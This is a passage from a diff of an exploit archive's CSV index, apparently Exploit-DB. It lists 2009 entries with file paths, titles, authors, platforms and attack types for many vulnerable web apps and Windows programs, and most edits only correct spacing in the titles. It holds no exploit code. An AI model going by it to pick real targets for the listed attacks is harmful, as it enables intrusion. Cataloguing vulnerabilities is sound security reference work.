+8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0 8041,platforms/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System - (geohttpserver) DT",2009-02-11,"Dejan Levaja",windows,remote,0 8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0 8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - (editcomments.php id) SQL Injection",2009-02-11,Osirys,php,webapps,0 @@ -7575,7 +7576,7 @@ id,file,description,date,author,platform,type,port 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0 -8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload / DB / SQL / Cross-Site Scripting / CM",2009-02-12,"Aria-Security Team",asp,webapps,0 +8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / CM",2009-02-12,"Aria-Security Team",asp,webapps,0 8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0 8051,platforms/hardware/dos/8051.html,"Nokia N95-8 - browser (setAttributeNode) Method Crash Exploit",2009-02-13,"Juan Yacubian",hardware,dos,0 @@ -7598,7 +7599,7 @@ id,file,description,date,author,platform,type,port 8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass by Cookie SQL Injection",2009-02-16,x0r,php,webapps,0 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0 -8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod'SQL Injection",2009-02-17,x0r,php,webapps,0 +8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0 8074,platforms/multiple/local/8074.rb,"Oracle 10g - MDSYS.SDO_TOPO_DROP_FTBL SQL Injection (Metasploit)",2009-02-18,sh2kerr,multiple,local,0 8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution Exploit",2009-02-18,Lidloses_Auge,php,webapps,0 @@ -7611,7 +7612,7 @@ id,file,description,date,author,platform,type,port 8084,platforms/windows/dos/8084.pl,"Got All Media 7.0.0.3 - (t00t) Remote Denial of Service",2009-02-20,LiquidWorm,windows,dos,0 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 -8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat'File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 +8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection",2009-02-20,Osirys,php,webapps,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow (PoC)",2009-02-23,webDEViL,windows,dos,0 @@ -7659,7 +7660,7 @@ id,file,description,date,author,platform,type,port 8135,platforms/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Files Local Heap Overflow (PoC)",2009-03-02,Hakxer,windows,dos,0 8136,platforms/php/webapps/8136.txt,"Joomla/Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 8137,platforms/windows/local/8137.py,"Media Commands - '.m3u' Local SEH Overwrite",2009-03-02,His0k4,windows,local,0 -8138,platforms/windows/local/8138.c,"VUplayer 2.49 - '.cue'Local Buffer Overflow",2009-03-02,"Assed Edin",windows,local,0 +8138,platforms/windows/local/8138.c,"VUplayer 2.49 - '.cue' Local Buffer Overflow",2009-03-02,"Assed Edin",windows,local,0 8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0 8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0 @@ -7705,7 +7706,7 @@ id,file,description,date,author,platform,type,port 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Post-Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0 -8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue'Universal Buffer Overflow",2009-03-10,Stack,windows,local,0 +8189,platforms/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,windows,local,0 8190,platforms/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",windows,dos,0 8191,platforms/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 - XML Injection",2009-03-10,"SEC Consult",multiple,remote,0 8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (Playlist) Universal SEH Overwrite",2009-03-10,His0k4,windows,local,0 @@ -7752,16 +7753,16 @@ id,file,description,date,author,platform,type,port 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0 8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - (qorder) SQL Injection",2009-03-18,girex,php,webapps,0 8241,platforms/multiple/dos/8241.txt,"ModSecurity < 2.5.9 - Remote Denial of Service",2009-03-19,"Juan Galiana Lara",multiple,dos,0 -8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 - '.cue'Stack Overflow",2009-03-19,Stack,windows,local,0 +8242,platforms/windows/local/8242.rb,"Chasys Media Player 1.1 - '.cue' Stack Overflow",2009-03-19,Stack,windows,local,0 8243,platforms/php/webapps/8243.txt,"bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0 8245,platforms/multiple/dos/8245.c,"SW-HTTPD Server 0.x - Remote Denial of Service",2009-03-19,"Jonathan Salwan",multiple,dos,0 -8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist'Local Buffer Overflow",2009-03-19,zAx,windows,local,0 +8246,platforms/windows/local/8246.pl,"Chasys Media Player - '.lst Playlist' Local Buffer Overflow",2009-03-19,zAx,windows,local,0 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Command Execution (Post-Authenticated)",2009-03-19,"Emory University",cgi,webapps,0 8248,platforms/windows/remote/8248.py,"POP Peeper 3.4.0.0 - (From) Remote Buffer Overflow (SEH)",2009-03-20,His0k4,windows,remote,0 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - (.bsl) Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD ElbyCDIO.sys < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 -8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl'Universal SEH Overwrite",2009-03-20,His0k4,windows,local,0 +8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal SEH Overwrite",2009-03-20,His0k4,windows,local,0 8252,platforms/php/webapps/8252.txt,"pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0 8253,platforms/windows/remote/8253.c,"Racer 0.5.3b5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",windows,remote,0 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0 @@ -7784,7 +7785,7 @@ id,file,description,date,author,platform,type,port 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - (module_pages_site.php post) Local File Inclusion Exploit",2009-03-23,"Alfons Luja",php,webapps,0 8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution Exploit",2009-03-23,darkjoker,php,webapps,0 8273,platforms/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - (Post-Authenticated) Multiple Vulnerabilities",2009-03-23,"Jonathan Salwan",windows,remote,0 -8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml'Universal SEH Overwrite",2009-03-23,Stack,windows,local,0 +8274,platforms/windows/local/8274.pl,"POP Peeper 3.4.0.0 - '.eml' Universal SEH Overwrite",2009-03-23,Stack,windows,local,0 8275,platforms/windows/local/8275.pl,"POP Peeper 3.4.0.0 - '.html' Universal SEH Overwrite",2009-03-23,Stack,windows,local,0 8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0 @@ -7808,7 +7809,7 @@ id,file,description,date,author,platform,type,port 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - (username) Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (Local File Inclusion) Remote Command Execution Exploit",2009-03-27,Osirys,php,webapps,0 -8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - '.CMP'Stack Overflow",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 +8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - '.CMP' Stack Overflow",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 8300,platforms/windows/dos/8300.py,"PowerCHM 5.7 - (.hhp) Stack Overflow (PoC)",2009-03-27,"Encrypt3d.M!nd ",windows,dos,0 8301,platforms/windows/local/8301.pl,"PowerCHM 5.7 - (hhp) Local Buffer Overflow",2009-03-29,LiquidWorm,windows,local,0 8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0 @@ -7855,7 +7856,7 @@ id,file,description,date,author,platform,type,port 8343,platforms/windows/local/8343.pl,"UltraISO 9.3.3.2685 - CCD/IMG Universal Buffer Overflow",2009-04-03,SkD,windows,local,0 8344,platforms/multiple/dos/8344.py,"IBM DB2 < 9.5 pack 3a - Connect Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 8345,platforms/multiple/dos/8345.py,"IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service",2009-04-03,"Dennis Yurichev",multiple,dos,0 -8346,platforms/php/webapps/8346.txt,"ActiveKB Knowledgebase - 'loadpanel.php Panel'Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 +8346,platforms/php/webapps/8346.txt,"ActiveKB Knowledgebase - 'loadpanel.php Panel' Local File Inclusion",2009-04-03,"Angela Chang",php,webapps,0 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 - COM_applyFilter()/cookies Blind SQL Injection",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - 'page.php id' SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",php,webapps,0 @@ -7905,7 +7906,7 @@ id,file,description,date,author,platform,type,port 8395,platforms/php/webapps/8395.txt,"Redaxscript 0.2.0 - (language) Local File Inclusion",2009-04-10,SirGod,php,webapps,0 8396,platforms/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,php,webapps,0 8397,platforms/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,asp,webapps,0 -8398,platforms/windows/remote/8398.php,"ftpdmin 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 +8398,platforms/windows/remote/8398.php,"FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0 8401,platforms/windows/local/8401.cpp,"HTML Email Creator 2.1b668 - (html) Local SEH Overwrite",2009-04-13,dun,windows,local,0 8402,platforms/windows/dos/8402.pl,"Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)",2009-04-13,Cyber-Zone,windows,dos,0 @@ -7925,11 +7926,11 @@ id,file,description,date,author,platform,type,port 8416,platforms/windows/local/8416.pl,"Mini-stream Ripper 3.0.1.1 - '.m3u' Universal Stack Overflow",2009-04-13,Stack,windows,local,0 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0 -8419,platforms/windows/remote/8419.pl,"ftpdmin 0.96 - Arbitrary File Disclosure Exploit",2009-04-13,Stack,windows,remote,21 +8419,platforms/windows/remote/8419.pl,"FTPDMIN 0.96 - Arbitrary File Disclosure Exploit",2009-04-13,Stack,windows,remote,21 8420,platforms/windows/local/8420.py,"BulletProof FTP Client 2009 - (.bps) Buffer Overflow (SEH)",2009-04-13,His0k4,windows,local,0 8421,platforms/windows/remote/8421.py,"Steamcast - (HTTP Request) Remote Buffer Overflow (SEH) (1)",2009-04-13,His0k4,windows,remote,8000 8422,platforms/windows/remote/8422.py,"Steamcast - (HTTP Request) Remote Buffer Overflow (SEH) (2)",2009-04-13,His0k4,windows,remote,8000 -8423,platforms/php/webapps/8423.txt,"Jamroom - 'index.php t'Local File Inclusion",2009-04-14,zxvf,php,webapps,0 +8423,platforms/php/webapps/8423.txt,"Jamroom - 'index.php t' Local File Inclusion",2009-04-14,zxvf,php,webapps,0 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0 8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0 8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - '.m3u' Universal Stack Overflow",2009-04-14,AlpHaNiX,windows,local,0 @@ -7941,16 +7942,16 @@ id,file,description,date,author,platform,type,port 8432,platforms/php/webapps/8432.txt,"Aqua CMS - (username) SQL Injection",2009-04-14,halkfild,php,webapps,0 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps,0 8434,platforms/windows/dos/8434.html,"PowerCHM 5.7 - (Long URL) Local Stack Overflow (PoC)",2009-04-14,SuB-ZeRo,windows,dos,0 -8435,platforms/php/webapps/8435.txt,"W2B phpEmployment - 'conf.inc'File Disclosure",2009-04-14,InjEctOr5,php,webapps,0 +8435,platforms/php/webapps/8435.txt,"W2B phpEmployment - 'conf.inc' File Disclosure",2009-04-14,InjEctOr5,php,webapps,0 8436,platforms/php/webapps/8436.txt,"Job2C 4.2 - (profile) Arbitrary File Upload",2009-04-15,InjEctOr5,php,webapps,0 -8437,platforms/php/webapps/8437.txt,"phpAdBoard - 'conf.inc'Remote Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8438,platforms/php/webapps/8438.txt,"phpGreetCards - 'conf.inc'Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8437,platforms/php/webapps/8437.txt,"phpAdBoard - 'conf.inc' Remote Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8438,platforms/php/webapps/8438.txt,"phpGreetCards - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8439,platforms/php/webapps/8439.txt,"W2B Restaurant 1.2 - (conf.inc) Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8440,platforms/php/webapps/8440.txt,"phpAdBoardPro - 'config.inc'Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8441,platforms/php/webapps/8441.txt,"phpDatingClub - 'conf.inc'File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 -8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc'Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8440,platforms/php/webapps/8440.txt,"phpAdBoardPro - 'config.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8441,platforms/php/webapps/8441.txt,"phpDatingClub - 'conf.inc' File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 +8442,platforms/php/webapps/8442.txt,"Job2C - 'conf.inc' Config File Disclosure",2009-04-15,InjEctOr5,php,webapps,0 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0 -8444,platforms/windows/local/8444.cpp,"Star Downloader Free 1.45 - '.dat'Universal SEH Overwrite",2009-04-15,dun,windows,local,0 +8444,platforms/windows/local/8444.cpp,"Star Downloader Free 1.45 - '.dat' Universal SEH Overwrite",2009-04-15,dun,windows,local,0 8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - '.mid' Integer Overflow (PoC)",2009-04-15,HuoFu,windows,dos,0 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0 8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow (PoC)",2009-04-15,e.wiZz!,windows,dos,0 @@ -8040,7 +8041,7 @@ id,file,description,date,author,platform,type,port 8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injections",2009-04-24,"Salvatore Fresta",php,webapps,0 8534,platforms/linux/local/8534.c,"libvirt_proxy 0.5.1 - Privilege Escalation",2009-04-27,"Jon Oberheide",linux,local,0 -8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - '.rdl'Local Buffer Overflow",2009-04-27,G4N0K,windows,local,0 +8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - '.rdl' Local Buffer Overflow",2009-04-27,G4N0K,windows,local,0 8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - '.asx' Local Buffer Overflow (SEH) (1)",2009-04-27,His0k4,windows,local,0 8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - (Directory Traversal/File Disclosure) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0 8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure",2009-04-27,brain[pillow],php,webapps,0 @@ -8051,7 +8052,7 @@ id,file,description,date,author,platform,type,port 8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 8544,platforms/linux/dos/8544.pl,"iodined 0.4.2-2 - (forged DNS packet) Denial of Service",2009-04-27,"Albert Sellares",linux,dos,0 8545,platforms/php/webapps/8545.txt,"dew-newphplinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0 -8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php ln'Local File Inclusion",2009-04-27,SirGod,php,webapps,0 +8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php ln' Local File Inclusion",2009-04-27,SirGod,php,webapps,0 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0 8549,platforms/php/webapps/8549.txt,"Flatchat 3.0 - (pmscript.php with) Local File Inclusion",2009-04-27,SirGod,php,webapps,0 @@ -8067,7 +8068,7 @@ id,file,description,date,author,platform,type,port 8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure Exploit (C)",2009-04-28,StAkeR,php,webapps,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 -8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.DLL'Remote Buffer Overflow Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 +8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - 'DCCFAXVW.dll' Remote Buffer Overflow Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - (banner-details.php id) SQL Injection",2009-04-29,snakespc,php,webapps,0 8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure Exploit",2009-04-29,ZoRLu,windows,remote,0 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 @@ -8083,7 +8084,7 @@ id,file,description,date,author,platform,type,port 8577,platforms/php/webapps/8577.txt,"leap CMS 0.1.4 - (SQL Injection / Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0 8578,platforms/windows/dos/8578.pl,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow (PoC)",2009-04-30,SirGod,windows,dos,0 8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow Exploit",2009-04-30,MITBOY,windows,remote,0 -8580,platforms/windows/local/8580.py,"Mercury Audio Player 1.21 - '.b4s'Local Stack Overflow",2009-04-30,His0k4,windows,local,0 +8580,platforms/windows/local/8580.py,"Mercury Audio Player 1.21 - '.b4s' Local Stack Overflow",2009-04-30,His0k4,windows,local,0 8581,platforms/bsd/dos/8581.txt,"Multiple Vendor - PF Null Pointer Dereference",2009-04-30,Rembrandt,bsd,dos,0 8582,platforms/windows/local/8582.py,"Mercury Audio Player 1.21 - '.pls' SEH Overwrite",2009-04-30,His0k4,windows,local,0 8583,platforms/windows/local/8583.py,"Mercury Audio Player 1.21 - '.m3u' Local Stack Overflow Exploit",2009-05-01,His0k4,windows,local,0 @@ -8092,12 +8093,12 @@ id,file,description,date,author,platform,type,port 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injections",2009-05-01,YEnH4ckEr,php,webapps,0 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b - Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Buffer Overflow (PoC)",2009-05-01,SirGod,windows,dos,0 -8589,platforms/windows/local/8589.py,"RM Downloader - '.smi'Local Stack Overflow",2009-05-01,"ThE g0bL!N",windows,local,0 +8589,platforms/windows/local/8589.py,"RM Downloader - '.smi' Local Stack Overflow",2009-05-01,"ThE g0bL!N",windows,local,0 8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 - '.m3u' Local SEH Overwrite",2009-05-01,His0k4,windows,local,0 8591,platforms/windows/local/8591.py,"Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (2)",2009-05-01,"Encrypt3d.M!nd ",windows,local,0 8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - '.m3u' Local Stack Overflow (3)",2009-05-01,Stack,windows,local,0 8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - (index.php language) Local File Inclusion",2009-05-01,SirGod,php,webapps,0 -8594,platforms/windows/local/8594.pl,"RM Downloader - '.smi'Universal Local Buffer Overflow",2009-05-01,Stack,windows,local,0 +8594,platforms/windows/local/8594.pl,"RM Downloader - '.smi' Universal Local Buffer Overflow",2009-05-01,Stack,windows,local,0 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 8596,platforms/asp/webapps/8596.pl,"Winn ASP GuestBook 1.01b - Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service (PoC)",2009-05-04,mu-b,solaris,dos,0 @@ -8131,12 +8132,12 @@ id,file,description,date,author,platform,type,port 8625,platforms/windows/dos/8625.pl,"Sorinara Streaming Audio Player 0.9 - '.pla' Local Stack Overflow (PoC)",2009-05-07,GoLd_M,windows,dos,0 8626,platforms/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,php,webapps,0 8627,platforms/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,asp,webapps,0 -8628,platforms/windows/local/8628.pl,"RM Downloader 3.0.0.9 - '.RAM'Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 -8629,platforms/windows/local/8629.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM'Buffer Overflow",2009-05-07,G4N0K,windows,local,0 -8630,platforms/windows/local/8630.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF'Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 -8631,platforms/windows/local/8631.pl,"Mini-stream Ripper 3.0.1.1 - '.RAM'Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 +8628,platforms/windows/local/8628.pl,"RM Downloader 3.0.0.9 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 +8629,platforms/windows/local/8629.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.RAM' Buffer Overflow",2009-05-07,G4N0K,windows,local,0 +8630,platforms/windows/local/8630.pl,"Mini-stream ASX to MP3 Converter 3.0.0.7 - '.asx HREF' Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 +8631,platforms/windows/local/8631.pl,"Mini-stream Ripper 3.0.1.1 - '.RAM' Local Buffer Overflow",2009-05-07,G4N0K,windows,local,0 8632,platforms/windows/local/8632.pl,"Mini-stream Ripper 3.0.1.1 - '.asx' (HREF) Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 -8633,platforms/windows/local/8633.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM'Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 +8633,platforms/windows/local/8633.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.RAM' Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 8634,platforms/windows/local/8634.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - '.asx' Local Buffer Overflow Exploit",2009-05-07,G4N0K,windows,local,0 8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - (Authentication Bypass) SQL Injection",2009-05-07,snakespc,php,webapps,0 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL 